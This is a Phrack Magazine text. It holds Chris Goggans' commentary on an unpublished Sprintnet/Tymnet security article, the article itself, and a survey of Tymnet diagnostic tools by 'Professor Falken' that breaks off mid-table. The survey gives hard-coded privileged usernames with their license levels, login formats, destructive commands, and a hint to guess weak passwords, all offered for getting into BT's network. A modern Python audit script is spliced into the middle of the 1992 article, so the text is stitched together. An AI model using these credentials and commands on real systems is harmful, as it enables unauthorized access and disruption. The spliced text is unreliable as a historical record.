The following article, although very, very tame by my standards, and admittedly lacking in enough hardcore information to help security professionals to apply a quick fix to their many problems, caused quite a stir among the folks at ISPNews. Since this article was from me, a self-proclaimed hacker, it underwent an extraordinary amount of scrutiny. Rather than be accepted or denied by the editor, my article got the dubious honor of being sent before an editorial advisory board. I checked every back issue of ISPNews and could find no mention of such an entity until the November/December 1991 issue, the issue immediately following a lengthy interview with none other than myself. When I questioned Len Spitz about this rather odd fact, he maintained that this committee had indeed existed, but stammered his way through my question to name any other article that they had convened to judge in the past, and to explain the duties of such a group. He could not give me any answers.
The group itself was obviously geared to be a type of kangaroo-court. It consisted of:

William J. Cook -- The man who less than two years prior had ordered my privacy and civil rights violated by the Secret Service solely on the basis of two bulletin board posts and my association with members of the Legion of Doom and the Phrack Magazine staff.

William H. Murray -- A senior consultant with Deloitte & Touche who had two weeks prior stood up before my presentation to the MIS Training Institute's 11th Annual Conference and said loudly "I can't take this any more, I'm leaving," to the astounded audience. The man who went on to state in his own column in ISPNews, "Can we lie down with dogs and get up without fleas?" and "Ask yourself if you wish to work in a profession populated by rogues. Ask yourself if you want your reputation mixed with theirs."

Winn Schwartau -- A security consultant with a broad view and an open mind, undoubtedly resulting from his background in the music industry, as opposed to the bean-counting world of MIS.

David J. Stang -- Director of research, NCSA. Noted virus specialist.

This was the group. Here is what they said about my article:

Bill Cook -- "It's very well-written and informative, but shouldn't be published for legal reasons." (What those reasons might have been was not stated, nor did Mr. Cook return my call to his office.)

Bill Murray -- Was not even given the file to read, as his response was deemed too predictable.

Winn Schwartau -- "Publish it. This is valuable information."

David Stang -- Was not given the file because, according to Len Spitz, "David is just a virus expert, and this isn't in his arena, so we gave it to Ray Kaplan."

Ray Kaplan -- Did not want to comment on it because he said, "It's not my expertise, so I gave it to a friend."
I believe Ray did not want to get involved with anything having to do with hackers after the reactionary attitudes of the DECUS attendees towards his defense of Kevin Mitnick that nearly left him in bankruptcy. I cannot blame him at all. (Hell, I like the guy...he's certainly more brazen with attitude these days, I mean, he went to HoHoCon for God's sake!)

Ray's Friend -- "This is of absolutely no use to the information security professional, but of great use to the hacker community."

I still do not know who Ray's "friend" was. I hope his Alzheimer's has subsided since this comment.

Needless to say, the article went unpublished. Shortly thereafter I received a letter from Robert Fox, an assistant vice-president at Sprint. Somehow my little article had snaked its way over to Kansas City. It's amazing how one faxed copy of an article could have reached so many people in such a short period of time. Mr. Fox had the following to say:

------------------------------------------------------------------------

United Telecom/US Sprint
9221 Ward Parkway
Kansas City, Missouri 64114
816-822-6262

Robert F. Fox                                         January 13, 1992
Assistant Vice President
Corporate Security

VIA AIRBORNE EXPRESS

Mr. Chris Goggans
COMSEC
Suite 1470
7322 Southwest Freeway
Houston, TX 77074

Re: Your Article "Packet-switched Networks Security Begins With Configuration"

Dear Mr. Goggans:

A copy of the referenced unpublished article, which is enclosed with this letter, has come to our attention. After review, we believe the article is inaccurate and libelous. If published the contents of the article could cause damage to Sprint customers, Sprint and our reputation, and we request that you not publish or otherwise disseminate it.
In addition, we believe some of the information contained in the article has been obtained through violation of the property rights of Sprint and/or our customers and we demand that you cease any efforts or attempts to violate or otherwise compromise our property whether or not for your personal financial gain.

Sincerely,

Robert F. Fox

Enclosure

------------------------------------------------------------------------

Regardless of how Mr. Fox came into possession of this article, I have to question his letter based on his comments. First he states that the information is almost criminally incorrect and could cause harm to Sprint's reputation. Then he states that information in the article has come to be known through the violation of the security of Sprintnet and/or clients of Sprintnet. In effect, I am both a thief and a liar according to Mr. Fox. Well, if I were a thief the information could not possibly be inaccurate if it were obtained from Sprintnet or its clients. If I were a liar, why would they think the information came from themselves and/or their clients?

Mr. Fox's thinly veiled threat caused me great amusement. I then decided no mainstream publication would touch this article. I don't know why everyone is so scared of the truth. Perhaps if the truth were known people would have to work, and perhaps if the truth were known some people would be out of work. None of this is of concern to me anymore. I am here to speak the truth and to provide uncensored information gathered from a variety of sources to provide readers of this magazine the facts they need to quench their thirst for knowledge.

This article is included as a prelude to a series of articles all based on packet switched networks as related to information merely alluded to in my harmless little article. To our readers, "enjoy." To the cowering so-called security experts, "kiss my ass."
------------------------------------------------------------------------

          Packet-switched Networks Security Begins with Configuration

For many companies the use of packet-switched networks has allowed for increased interconnectivity of systems and easy remote access. Connection to a major public packet-switched network brings increased access points with local dialups in many cities around the nation as well as access points from foreign countries. With the many obvious benefits provided by this service, improper configuration of either the host's connection to the network or of the network itself can lead to extreme security problems. The very connection to a public packet-switched network immediately increases the exposure of that particular system.

America's two major commercial networks, BT-Tymnet and Sprintnet, are probably the most popular US targets for hackers around the world. The wealth of systems available on these two networks has provided hackers with a seemingly endless supply of sites on which to sharpen their skills. The ease of use inherent in both networks makes them popular for legitimate users as well as illegitimate users.

The Telenet software utilized in the Sprintnet network allows users to enter a network user address (NUA) in the standard format as outlined in the X.121 numbering standard:

        DDDDAAAHHHHHPP

  Where D = the four digit data network identifier code (DNIC)
        A = the three digit area code corresponding to the host
        H = the host address
        P = the port or (sub) address

On domestic calls the DNIC for Sprintnet (3110) is stored in all Sprintnet equipment and is used as the default. By merely picking an area code, most often corresponding to the standard area codes of the North American Numbering Plan, and an additional one to five digits, a would-be intruder can connect to any number of systems while looking for targets.
In the past many software packages have been written to automate this process, and large scans of the network have been published in a variety of underground media.

The Tymnet II software utilized in BT's Tymnet prompts the user for a mnemonic which corresponds to a host or number of hosts. The mnemonic, or username, is referenced to a fixed host address in the network's Master User Directory (MUD). This username may allow the caller to connect to a variety of sites, as opposed to merely one, by entering additional information in separate fields after the username. It may also correspond to a network gateway, thereby allowing the user to enter a number in the X.121 format and connect to that specific site. This particular network, with its primary use of words as opposed to numbers, has been compromised by intruders who guess common words or names in their attempts to connect to remote sites.

Each network has its own particular set of problems, but solutions to these problems are both simple and quick in implementation.

SPRINTNET

The first deterrent in securing a host on this network is to restrict access to the site. This can be accomplished in a number of ways. The most obvious is to have the site refuse collect calls. All calls on Sprintnet are reverse-billed, unless the site has specifically asked that they not be billed for incoming calls. This makes the site accessible only through the use of a Network User Identifier (NUI).

Another method of restricting access from intruders is to place the host in a closed user group (CUG). By electing to have the host in a CUG, the administrator can allow only certain NUIs to connect, and can also restrict the actual addresses from which access is allowed. For example: A site is placed in a CUG that will allow only calls from the company's remote branch in Dallas to access the host, and only with the NUI created specifically for that branch.
All attempts to access the site from an address outside the 214 area will result in an error message indicating an invalid source address. All attempts to connect with an invalid NUI will result in an error indicating an invalid ID. This information is maintained in the network's main TAMS (TP Access Management System) database, and is not subject to manipulation under normal circumstances.

Many sites on the Sprintnet network have specific subaddresses connecting to a debug port. This is usually at subaddress 99. All connections to debug ports should be restricted. Allowing users access to this port will give them the ability to load and display memory registers of the Sprintnet equipment connected to the port, and even to reset as well as enable or disable the host. Most debug ports are equipped with preset passwords from the vendor, which should be changed. These ports should also restrict connection from all addresses except those specified by the company.

An additional measure that may foil intruders relying on software programs to find all addresses in a given area code is to request that the host be given an address above 10000. The time involved in scanning the network is extensive and most casual intruders will not look past the 10000 range. In fact, many will not venture past 2000.

BT-TYMNET

Any company having a host on the Tymnet network should choose a username that is not easily associated with the company or one that is not a common word or name. If an intruder is aware that XYZ Inc. has a UNIX based system on TYMNET, he or she would begin attempts to find this system with the obvious usernames: XYZ, XYZINC, XYZNET, XYZ1, XYZUNIX, UNIX, etc. BT-Tymnet allows for these usernames to have additional password security as well. All hosts should have this option enabled, and passwords should be changed frequently.
The password should always be a minimum of six characters, should include letters, numbers and at least one symbol character, and should not be associated in any way with the corresponding username.

Many clients of BT-Tymnet have purchased the Tymnet II software and have individual sub-networks that are linked to the public network through gateways. Each subnet is personally configured and maintained through the use of a package of utilities provided by Tymnet. These utilities each perform a specific task and are highly important to the smooth operation of the network. These utilities may be accessed either directly from the host-end or remotely through the network by entering a corresponding username. Some of these utilities are:

        XRAY   : a monitoring utility
        DDT    : a debugging utility
        NETVAL : a database of username to host correspondence
        PROBE  : a monitoring utility
        TMCS   : a monitoring utility

Under NO CIRCUMSTANCES should these utilities be left without a password on the company's subnet. These utilities should also never be named similarly to their given name. Should an intruder gain access to any of these utilities, the integrity of your network will be at risk.

For example: Allowing an outsider access to the XRAY utility would give him or her the ability to monitor both incoming and outgoing data from the host using the "TA" command (display trace data table in ASCII). Use of certain XRAY commands is restricted by a security function that allows only certain usernames to execute commands on the basis of their existence in a "Goodguy" list, which can be displayed by any XRAY user. Should a user hold the highest privilege level (2), he or she can add or delete from the "Goodguy" list, reset connections, and display trace data on channels other than the default channel.

Allowing a user access to DDT can result in complete disruption of the network. DDT allows the user the ability to write directly to the network controller "node code" and alter its configuration.
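As an added example (not code from the article or from either network operator), the following Python audits one Sprintnet host entry and one Tymnet host entry against the configuration rules given in the SPRINTNET and BT-TYMNET sections above: refusing collect calls, CUG source-address and NUI checks, the subaddress 99 debug port, the address-above-10000 advice, the guessable-username list, the password rule, and vendor-named or passwordless utilities. The configuration dictionaries, NUAs, NUI names and passwords are constructed sample values, and the fixed-width X.121 layout (five-digit host, two-digit port) is an assumption of this example, not something the article states.

```python
import re
import string

# Values taken from the article; everything else below is constructed sample data.
SPRINTNET_DNIC = "3110"    # default DNIC stored in all Sprintnet equipment
DEBUG_SUBADDRESS = "99"    # the usual debug-port subaddress
SCAN_CEILING = 10000       # casual scanners rarely look past this host address
TYMNET_UTILITIES = ("XRAY", "DDT", "NETVAL", "PROBE", "TMCS")

def parse_nua(nua):
    """Split an X.121 address DDDDAAAHHHHHPP into (dnic, area, host, port).
    Assumed here: host zero-padded to five digits, port two digits, and a
    domestic Sprintnet NUA may omit the DNIC (3110 is then assumed)."""
    digits = re.sub(r"\D", "", nua)
    if len(digits) in (8, 10):
        digits = SPRINTNET_DNIC + digits
    if len(digits) not in (12, 14):
        raise ValueError("malformed NUA: %r" % nua)
    return digits[:4], digits[4:7], digits[7:12], digits[12:14] or None

def sprintnet_call(host, source_nua, nui=None):
    """Network-side checks for a call to a configured host. Returns what the
    caller sees: one of the two CUG errors the article names, a refused
    collect call, or a connection."""
    _, area, _, _ = parse_nua(source_nua)
    cug = host.get("cug")
    if cug is not None:
        if area not in cug["areas"]:
            return "invalid source address"
        if nui not in cug["nuis"]:
            return "invalid ID"
    if nui is None and not host["accept_collect"]:
        return "collect call refused"
    return "connected"

def audit_sprintnet_host(host):
    """Return the weak settings found in one Sprintnet host configuration."""
    findings = []
    _, _, host_addr, _ = parse_nua(host["address"])
    if host["accept_collect"]:
        findings.append("accepts collect calls; an NUI should be required")
    if host.get("cug") is None:
        findings.append("not in a closed user group")
    debug = host.get("debug_port")
    if debug is not None:
        if not debug["password_changed"]:
            findings.append("debug port %s keeps the vendor preset password" % DEBUG_SUBADDRESS)
        if not debug["restricted_to"]:
            findings.append("debug port %s reachable from any address" % DEBUG_SUBADDRESS)
    if int(host_addr) <= SCAN_CEILING:
        findings.append("host address %s is inside the range area-code scanners cover" % host_addr)
    return findings

def obvious_tymnet_usernames(company):
    """The guesses the article lists for a company (short name, e.g. XYZ) on Tymnet."""
    c = company.upper()
    return {c, c + "INC", c + "NET", c + "1", c + "UNIX", "UNIX"}

def audit_tymnet_host(host, company):
    """Return the weak settings found in one Tymnet host configuration."""
    findings = []
    user = host["username"].upper()
    if user in obvious_tymnet_usernames(company) or company.upper() in user:
        findings.append("username %s is easily associated with the company" % host["username"])
    pw = host.get("password") or ""
    if not pw:
        findings.append("username has no password")
    else:
        if len(pw) < 6:
            findings.append("password shorter than six characters")
        if not (any(ch.isalpha() for ch in pw) and any(ch.isdigit() for ch in pw)
                and any(ch in string.punctuation for ch in pw)):
            findings.append("password lacks letters, numbers or a symbol")
        # "not associated with the username" is approximated by a substring test
        if user in pw.upper() or pw.upper() in user:
            findings.append("password is derived from the username")
    for util in host.get("utilities", []):
        if util["name"].upper() in TYMNET_UTILITIES:
            findings.append("utility %s still carries its vendor name" % util["name"])
        if not util.get("password"):
            findings.append("utility %s has no password" % util["name"])
    return findings

# Constructed sample configurations: a weak entry and a corrected one per network.
WEAK_SPRINTNET = {"address": "311021400123", "accept_collect": True, "cug": None,
                  "debug_port": {"password_changed": False, "restricted_to": []}}
HARDENED_SPRINTNET = {"address": "311021412345", "accept_collect": False,
                      "cug": {"areas": {"214"}, "nuis": {"DALLASBRANCH"}},
                      "debug_port": {"password_changed": True,
                                     "restricted_to": ["311021400010"]}}
WEAK_TYMNET = {"username": "XYZUNIX", "password": "xyz",
               "utilities": [{"name": "XRAY", "password": ""}]}
HARDENED_TYMNET = {"username": "QT7MRL", "password": "b4#Lw9q!",
                   "utilities": [{"name": "MNTR27", "password": "k2$Vp8zz"}]}

if __name__ == "__main__":
    print(audit_sprintnet_host(WEAK_SPRINTNET), audit_tymnet_host(WEAK_TYMNET, "XYZ"))
```

The weak Sprintnet entry produces five findings and the weak Tymnet entry six, while both hardened entries produce none; sprintnet_call shows the "invalid source address" and "invalid ID" outcomes for a caller outside the 214 area or without the branch NUI.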
Allowing a user access to NETVAL will allow the user to display all usernames active on the network and the corresponding host addresses.

OTHER PROBLEMS

EXAMPLE ONE

On many networks users have the ability to connect to the packet assembler/disassembler (PAD) of the network dial-ups. This has led to significant problems in the past.

In the mid-1980's two American hackers were exploring the German packet network DATEX-P. One connected to a host in Berlin and was immediately disconnected by the remote site. Before the hacker could react, the German host connected to the NUA corresponding to his Sprintnet PAD and sent him a login prompt. This alarmed the hacker greatly, as he assumed that the proprietors of the German host had somehow noticed his attempt to access their system. He contacted his partner and told him of the occurrence. The two concluded that since the NUA of the origination point is sent in the packet header, the remote site must have been programmed to recognize the NUA and then return the call. The fact that it had returned a call to a public PAD was intriguing to the pair, so they decided to attempt to recreate the event by calling each other. Both individuals connected to the network and one entered the NUA corresponding to the other's PAD. A connection resulted and the two were able to interact with one another. They then decided that they would periodically meet in this fashion and discuss their findings from Germany.

At the time of the next meeting, the connection did not occur as planned. One hacker quickly received a telephone call from the second who exclaimed rather excitedly that he had attempted to connect to his partner as planned, but accidentally connected to another PAD and intercepted a legitimate user typing his NUI. Further investigation proved that one could connect to public PADs during the idle period when the user was in network mode, prior to making a connection to a remote site.
This discovery was intended to remain secret, because of its extremely dangerous applications. Nevertheless, word of this discovery soon reached the entire hacker community and what came to be known as "PAD to PAD" was born. The "PAD to PAD" technique became so wide-spread that hackers were soon writing software to intercept data and emulate hosts and capture login names and passwords from unsuspecting network users. Hackers were intercepting thousands of calls every day from users connecting to systems ranging from banking and credit to the Fortune 500 to government sites.

After nearly two years of "PAD to PAD," Sprintnet was alerted to the crisis and disallowed all connections to public PADs. When Sprintnet expanded its service overseas they once again left access to the overseas PADs unrestricted. The problem went unnoticed again until their attention was brought to it by a hacker who called Sprintnet security and told them that they ought to fix it quickly before it became as wide-spread as before. The problem was resolved much more quickly this time.

This particular technique was not limited to Sprintnet. All networks using the Telenet software are at risk from this type of manipulation. This type of network manipulation was integral in the recent compromise of a large Bell Company's packet network in a much-publicized case. Certain foreign networks in countries such as Israel, England, Chile, Panama, Peru and Brazil are also at risk.

EXAMPLE TWO

In the late 1980's hackers stumbled onto a packet network owned and maintained by a large facilities maintenance company. This particular network had a huge flaw in its setup. It connected all calls placed through it as if they were placed with an NUI. This allowed hackers to place calls to addresses that refused collect connections on networks around the world. This became a popular method for hackers to access underground chat systems in Europe.
Additionally, this network contained a score of computers belonging to a major automobile manufacturer. Most of these systems were highly insecure. The network also allowed unrestricted access to network debug ports.

This particular network also had a toll-free number on an MCI exchange. At the time, MCI was having some difficulty getting their equipment to accept the ANI information to provide customers with a full call-detail report on their monthly statement. The hackers were well aware of this fact and made frequent use of the network with no fear of prosecution. Eventually MCI was able to fix their translation problem and were able to provide their clients with full call-detail reports. When this was learned, many hackers abandoned use of the network, but several others were later prosecuted for its usage when their number turned up on the bill.

EXAMPLE THREE

Until quite recently, intimate knowledge of the utilities driving various packet-switched networks was held by an exclusive few. While investigating a network owned by an extremely large Cleveland-based conglomerate, hackers came across a system where documentation on the usage of every utility was kept online. The hackers quickly downloaded all the information and it soon became somewhat wide-spread among the underground community. With less-skilled and more unscrupulous individuals in possession of this information, many networks began experiencing disruptions and system integrity was quickly lost as hackers began monitoring data traffic.

No information on the usage of packet networks or their utilities should ever be kept online. Hard copies should be kept in the possession of the network administrator, and when updated, obsolete versions must be destroyed.

WHAT TO DO

When a security violation stemming from a connection through the packet network is noticed, Network Security should be notified. Clients of BT-Tymnet should notify Steve Matthews at 408-922-7384.
Clients of Sprintnet should notify Pat Sisson at 703-689-6913. Once changes have been enacted in the network to prevent further break-ins, the host computer should be checked thoroughly for any changes or damages, and all individual account passwords should be changed.

CONCLUSION

It is critical that the packet network be configured properly and that all measures are taken to ensure its security. Even the most secure host computer can be easily compromised if it is connected to an insecure packet network.

----------------------------------------------------------------------

==Phrack Magazine==

                 Volume Four, Issue Forty-Two, File 5 of 14

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -

        Synopsis of Tymnet's Diagnostic Tools and their associated
               License Levels and Hard-Coded Usernames

                          by Professor Falken

                           February 14, 1993

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -

While the scope of this article is general, the information contained within is NOT for the novice Tymnet explorer. Novice or NOT, go ahead and read; however, caution should be taken when invoking any of these commands upon BT's network. Execution of certain commands can have debilitating consequences upon segments of the network.

In this article I intend to educate the reader about the various Tymnet diagnostic utilities that are available. This article is by no means an in-depth microscopic view of the utilities, but rather a brief, to-the-point survey course of what is available to qualified people. With each utility I will describe its use/s, list its major commands, and in DDT & XRAY's case, dispense its hard-coded usernames which allow you to become a 'qualified person.'

It seems the software engineers at Tymnet (for the lack of something better to do) like to rename ordinary words to complicated ones. For instance, within this article I will talk about LICENSE LEVELS. License levels are nothing more than security levels.
When I speak of License Level 4, just translate that to Security Level 4. I would have just called everything security levels, but I wanted to stay within that lethargic Tymnet mood for realism purposes. Another word the engineers pirated from 'GI JOE' was GOOD-GUYS. In our world, a Good-Guy is a valid username that can be used for logging into the various diagnostic utilities.

Like most conventional computers, Tymnet also needs an operating system for its code to run under. Tymnet's node-level, *multitasking*, operating system is called ISIS; it stands for 'Internally Switched Interface System.' It's designed for handling multiple communication links, allocating system memory, system job/process scheduling, and all the other BASIC things ALL operating systems do. Tymnet explains it in a more complicated and less to-the-point way, but to give equal time to the opposing viewpoint, this is what they say:

    "Internally Switched Interface System. The operating system for a
    TYMNET node; provides functions that control the overall operation
    of an Engine. These functions include, but are not limited to,
    memory allocation, message switching, job scheduling, interrupt
    processing, and I/O distribution. ISIS allows multiple data
    communications functions to run on a single processor. Two of its
    many services are debugging and I/O port management. Formerly known
    as ISIS-II or ISIS2.

    ISIS2, ISIS-II Obsolete terms. See Internally Switched Interface
    System (ISIS)."

At various points within this file I will refer to an ENGINE. Basically, an ENGINE is a minicomputer which handles all the processing requirements that ISIS and its applications demand. However, to be fair to all the Tymnet technoids, this is what BT says:

    "BT North America packet-handling hardware. The Engine
    communications processor is a member of a family of special-purpose
    minicomputers. It runs communications software such as Node Code
    (for switching), slot code (for protocol conversion and value-added
    functions), and the ISIS operating system. The Engine family
    consists of the Pico-Engine, Micro-Engine, Mini-Engine,
    Mini-Engine-XL, Dual-Mini-Engine-XL, Engine, and ATC."

You'd think they would have invented much NEATER names for their computer platforms than 'Mini-Engine' or 'Micro-Engine'. I would guess that BT's hardware engineers have less time than the software engineers to invent K-RAD names for their projects. Anyhow, as you can see, the ENGINE is the muscle behind Tymnet's network brawn.

Another term which is very basic to ANY understanding of Tymnet is the 'SUPERVISOR.' As you can see, the engineers searched high & low for this clever term. The Supervisor is many things, including the authentication kernel you interact with, the circuit billing system that subscribers unfortunately do not interact with, and generally the network's 'BIG BROTHER.' The Supervisor watches the status of the network at all times, keeping detailed logs and interceding when trouble erupts. The term Supervisor can also refer to the engine upon which the Supervisor is run.

With all that in mind, I will now introduce five of Tymnet's diagnostic tools. I intend on presenting them in this order: DDT, MUX, PROBE, LOAD-II, TOM, and XRAY. Please note that only DDT and XRAY have 'good-guy' lists provided.

DDT - Dynamic Debugging Tool
----------------------------

DDT is a utility which runs under the ISIS operating system. DDT is capable of loading or displaying a slot's content. A slot is an area of memory in a node in which Tymnet applications run. DDT can also be used for modification of a specific slot's slot code. Slot code is any program which has been assigned memory within the engine by ISIS. DDT also performs other lower-level diagnostic functions, which I will not go into.
Logging into DDT requires you to provide the 'please log in:' prompt a valid username and password. Upon checking the good-guy list and authenticating the user, the kernel process searches for the associated slot assignment. If no slot is assigned to the good-guy, the kernel will prompt you for a slot number. Once you enter a VALID slot number and it is available, the authentication kernel executes the DDT utility. When I say 'VALID' slot number, I mean a slot number which logically exists AND is attainable by your current good-guy's license level.

Actual logins to DDT take the form:

    please log in: goodguyID:host#
    password:

Where goodguyID is a valid goodguy, host# is the Tymnet subscriber who needs a little 'work' done, and obviously the password is what it is. While I would like to give you all the passwords I could, I don't think it is going to happen. So all I can do is suggest trying different variations of the goodguy IDs, and other dumb passwords unsecure people use.

Connection to primary DDT is displayed as the ever-so-friendly '*' prompt. It is from this prompt that all general DDT commands are directed. The most useful DDT commands are listed below in a general, extended, and RJE/3270T specific registry.

GENERAL DDT COMMANDS
--------------------

E       Execute a slot.
H       Halt a slot.   <---- DESTRUCTIVE See WARNING!
ZZ      Logs you out of DDT.
^#      Transfers control from the current slot to the slot specified
        by #.  (IE- ^7 Switches control to slot 7)
?CPU    Displays CPU utilization (Engine Performance)
?HIST   Displays a history of diagnostic messages.
?HOST   Displays the hosts in use by that slot.
?LU     Displays the logical unit to physical device assignment.
?MEM    Displays the time of memory errors if any.
?STAT   Allows the execution of EXTENDED DDT. To obtain the extended
        command prompt type '/'. Command prompt ':>'
?VERN   Displays the ISIS version followed by the SLOT's version.

WARNING!: It is possible to HALT a slot accidentally. This will freeze everything going in/out of the current slot. This can be BAD for customer satisfaction reasons. If you accidentally hit 'H', even without a CR/LF, it will hang the slot. So when the ?HIST or ?HOST commands are used, make SURE you type that important '?' beforehand. Otherwise you will halt everything going over that slot, effectively destroying the communication link.

EXTENDED COMMANDS FOR RJE & 3270T
---------------------------------

RJE & 3270T
===========
EXI          Logs you out. (DuH!)
QUIT         Return from extended DDT prompt ':>' to normal '*' DDT
             prompt.

RJE Only
========
HELP         Displays a list of commands available in extended RJE DDT
             mode. (A list not worth putting in here.)
SCOPE        Outputs a protocol trace.
TRACE        Outputs a state trace.

3270T Only
==========
HELP         Displays a list of commands available in extended 3270T
             DDT mode. (Again, a list not worth putting in here.)
STATUS       Displays status of all lines, control units, and devices.
STRTLN x     Start polling on line x. (Performance benchmark)
STRTCU x,y   Start polling control UNIT x on LINE y. (Performance
             benchmark)
STOPLN x     Stop polling on line 'x'
STOPCU x,y   Stop polling control UNIT x on LINE y.

NOTE: If you try to use an RJE command while logged into a 3270T, you will be shown the incredible "ILLEGAL COMMAND" string.

GOOD-GUYS AND LICENSE LEVELS
----------------------------

As with any username, there is an accompanying license level (security level) with each account. The different levels define which types of slots that username may access and the available commands. Some of the good-guys have access to all slots including supervisor, while others have access to only non-supervisor slots. The table below is a list of the actions that are available with the various different license levels.

L.DISC  Permits disk formatting.
L.H     Permits the halting, loading, and restarting of all slots for
        code-loading purposes.
L.P     Permits the halting, restarting, and online software
        modification to an active slot. (Except slots 0 and FF)
L.R     Permits logon to all slots. (Except 0 and FF)
L.SOA   Permits logon to a node's slot 0. (Node configuration.)
L.SOP   Permits the halting, restarting, and online software
        modification to slot 0.
L.SOR   Permits the reading of slot 0 files.
L.SUA   Permits logon to Supervisor slots.
L.SYA   Permits logon to a node's FF slot. (ISIS configuration node.)
L.SYR   Permits the reading of slot FF files.
L.SYP   Permits the halting, restarting, and online modification to
        slot FF.

The DDT license levels are numbered from 0 to 4, 4 being Gh0D. Each level has several of the above-named actions available to it. Listed below are the various actions available at the 0 through 4 license levels.

LEVEL   ACTIONS
=====   =======
  4     L.DISC, L.P, L.SOA, L.SOP, L.SUA, L.SYA, and L.SYP.
        (Disk format, halt, restart, online software mods, and reading
        of files for all slots AND supervisors. Like I said, GOD.)
  3     L.P, L.SOA, L.SOP, L.SYA, and L.SYP.
        (Halt, restart, online software mods, and reading of files for
        all slots and supervisors.)
  2     L.H, L.R, L.SOA, L.SOR
        (For code loading purposes: halt, restart, online software
        mods, and reading files for all slots and supervisor nodes.)
  1     L.R, L.SOA, L.SYA
        (Views ALL slots and supervisor nodes)
  0     L.R
        (Views all slots, EXCEPT supervisor slots and 0 & FF.)

What follows is a good-guy userlist with the associated license level of that username. I also note whether the account is ACTIVE/PASSIVE upon an operating node/slot combination and the seriousness of the network impact that those associated licenses can possibly create.
LICENSE LEVEL   GOOD GUY USERNAME   ACTIVE/PASSIVE   NETWORK IMPACT
=============   =================   ==============   ==============
      4         ISISTECH            Active           MAJOR
      4         NGROM               Active           MAJOR
      4         NSSC                Active           MAJOR
      4         RPROBE              Active           MAJOR
      4         RERLOG              Active           MAJOR
      4         RACCOUNT            Active           MAJOR
      4         RSYSMSG             Active           MAJOR
      4         RUN2                Active           MAJOR
      4         TNSCM               Active           MAJOR
      3         IEXP                Active           Moderate
      3         ISERV1              Active           Moderate
      3         ISERV2              Active           Moderate
      3         ISERV3              Active           Moderate
      3         ITECH1              Active           Moderate
      3         ITECH2              Active           Moderate
      3         ITECH3              Active           Moderate
      3         ITECH4              Active           Moderate
      3         ITECH5              Active           Moderate
      2         GATEWAY             Active           Minor
      1         DDT                 Passive
      1         DDTECH              Passive
      1         IOPPS               Passive
      1         ISERV               Passive
      1         ITECH               Passive
      0         VADICBUSY           Passive

MUX - The Circuit Multiplexer
-----------------------------

MUX is a tool which also runs within an ISIS slot. MUX allows the building, interconnecting, and controlling of several sets of circuits from a single terminal. Instead of logging in and out of each diagnostic tool as different commands are needed, MUX is used to create multiple concurrent circuits. Once these are set up, it is easy to switch back and forth between different diagnostic applications WITHOUT having to log off one before logging into another. Tymnet also likes to boast that you can chat with other users on MUX's 'Talk mode facility.' I'll stick to IRC until this catches on.

Logging into MUX is quite simple. It takes the form of:

    please log in: userid
    password:

NOTE: ATTN commands, see CHAR command.

ATTN ATTN       Allows you to send one attention character down the
                circuit.
ATTN C x        Labels the current port, where 'x' is the label you
                desire.
ATTN E          Allows you to switch to the next port you have defined.
                This command however is not valid from the command mode.
                The circuit label is presented and connection is made.
                Even though the prompt for that circuit is not
                presented, you ARE connected.
ATTN Z          Returns you to the command mode.
CHAR char       Configures your ATTN character to 'char'. So in the
                ATTN commands above, you will have to enter your ATTN
                character followed by the command character. The default
                ATTN character is CTRL-B. Personally, I like to set mine
                to '!'.
CONNECT pl1,pl2 Connect the output of port label-1 to port label-2.
                Usually your current port label is marked with a *
                preceding it in a 'LIST'; this is also known as a BOSS.
ENABLE pl       Enables a pl's (port label's) output.
EXIT            Leave MUX with all your circuits INTACT.
FLUSH pl        Flush pl's (port label's) output.
FREEZE N/F      Freeze (N=ON or F=OFF) current Boss.
GREETING msg    Sets up the greeting message.
HEAR N/F        Allow (N=ON or F=OFF) users to 'TALK' to each other.
HELP            Prints help messages. (ooof)
LIST            Lists all active ports for the current user. (ATTN Z L)
LABEL N/F       Labeling (N=ON or F=OFF) of all output sent to the Boss.
MAKE            Make a new circuit by logging onto a diagnostic tool.
                You will be prompted with the omnipresent 'Please log
                in:' prompt. Just log in as usual for the particular
                tool.
MESSAGE         Print last message.
QUIT            Leave MUX and ZAP all circuits created.
SEND pl         Send to pl (port label).
TALK username   Talks to 'username' providing HEAR=N.
TIME            Outputs date and time in format: 31Dec93 05:24
TRANSFER pl     Transfers control of this BOSS to pl (port label).
ZAP pl          Zap any circuits you made, where 'pl' is the port label.
                This command defaults to the port labeled '*' (Boss).
                This command is ONLY valid in command mode.

PROBE
-----

PROBE is probably one of the BEST known Tymnet diagnostic tools. PROBE is actually a sub-program of the Supervisor. PROBE is capable of monitoring the network, and it has access to current pictures of network topology, including host tables and node descriptors. PROBE shares common memory with the Supervisor and has circuit tracing capability. PROBE can be used to check the history of nodes & links, boot a node, trace a circuit, and reset a link or shut one down. PROBE can be accessed directly or through TMCS (Tymnet Monitoring and Control System).
To access PROBE from within TMCS you would enter the command:

    PROBE s

Where 's' is the active or 'sleeping' supervisor. For more PROBE-related TMCS commands or general TMCS commands, please refer to an appropriate source. If the demand is great enough, perhaps I will release a TMCS reference sheet in the future.

PROBE access is determined by the sum of the individual license levels granted to the user. PROBE licenses are as follows:

License   Description
-------   -----------
00        Permits view only commands -- user is automatically logged
          off from PROBE after 20 minutes of no activity.
04        Permits view only commands -- no automatic logoff.
20        Permits all 00 commands plus ability to effect changes to
          network links.
10        Permits ability to effect changes to node status.
01        Permits ability to effect changes to network supervisors.
02        Permits ability to effect changes to supervisor disks.

I do not have any hardcoded usernames for PROBE, with this exception. The PROBE access username 'PROBE' is hardcoded into the supervisor, and usually each host has one hardcoded PROBE username: CONTROL -- license level 37. So in comparison with the above chart, CONTROL has Gh0d access to PROBE commands, because everything added up equals 37 (duh). On many subnets, the username RPROBE has similar access.

PROBE COMMANDS

Command         Lic. Lvl   Description
-------         --------   -----------
CHANGE          00/04      Changes your PROBE personal password.
EXI             00/04      Logout.
HELP            00/04      Help. (Temple of Sub-Genius)
SEND x text     00/04      Sends message to Probe user whose job label
                           is 'x'.
VERSION         00/04      Lists current software version number.
WHO             00/04      Lists currently logged in PROBE users.
                           (Useful)

DISPLAY CMDS:

Command         Lic. Lvl   Description
-------         --------   -----------
ACCT            00/04      Displays # of accounting blocks on Supervisor
                           disk available for RAM session record data.
AN              00/04      Displays detailed information about active
                           nodes.
ASTAT           00/04      Displays number of login and circuit building
                           timeouts.
AU              00/04      Displays node numbers of ALL active nodes
                           that are up.
CHAN x          00/04      Displays port number used by Supervisor for
                           command circuit to node 'x'.
COST x          00/04      Displays cost of building command circuit to
